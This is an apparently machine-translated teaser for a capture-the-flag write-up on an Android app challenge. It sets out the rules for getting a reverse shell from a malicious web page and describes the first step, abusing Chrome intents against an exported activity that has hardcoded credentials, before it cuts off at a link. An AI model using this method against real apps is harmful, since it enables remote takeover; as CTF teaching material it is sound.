[Security Attack and Defense Challenge] Android app remote control actual combat

The third question of Aliju Security Attack and Defense Challenge Android PwnMe problem-solving ideas

Everyone encountered the problem of android app remote control in the third question of the official competition of Ju Security Challenge. We take you today to find out how to overcome this problem.

1. Title
Shopping application pwn (6 points)
Environment:
- Requires successful attack on ARM 64-bit Android phone, and can also be successfully attacked in emulator (running Google APIs ARM64 Android 7.0 image provided by Google's official Android SDK), in which the image It will be packaged and provided, see the topic download link. The emulator execution command reference is as follows: (qemu-system-aarch64 -sysdir . -datadir . -kernel kernel-qemu -system system.img -ramdisk ramdisk.img -data userdata.img)
- an apk containing bugs
- must be in non- root environment

Attack process:
- Load the apk into the emulator.
- Open the chrome browser and visit the address of the player's malicious webpage. (The web service is built by the player himself)
- The shell of this app can be obtained through the player's malicious webpage.
- The apk displays the "purchase successful"

target: the Chrome browser clicks the link, which causes the app's purchase logic to be triggered remotely, and "purchase successful" is displayed on the app interface.

Scoring criteria: 6 points for controlling the remote arbitrary code execution of the app by accessing the web page through the browser, of which:
1. Rebounding the shell to control the app, 5 points.
2. It is possible to further make the app interface display the "successful purchase" score and get a further 1 point.
3. The source code of the exploit program for remote arbitrary code execution shall be provided.
2. Problem-solving ideas The
attack process is as follows:



1. Android Intents with Chrome
The title requires "Chrome browser to click the link". Chrome's official document specifies how to send an intent app from the link. The official document link: https:// developer.chrome.com/multidevice/android/intents. Disassemble the ExamPwn.apk file and find that AndroidManifest.xml does accept relevant intents. As shown in the figure:



The class LoginActivity first accepts the intent to parse out the account password and match it. The account password is directly hardcoded in the class LoginActivity in plain text, and the disassembly can be seen directly. After the match is correct, the url in the intent is thrown to the class MainActivity. That is to say, the attacker's webpage is at least as follows:
read the full text and click directly: http://click.aliyun.com/m/9829/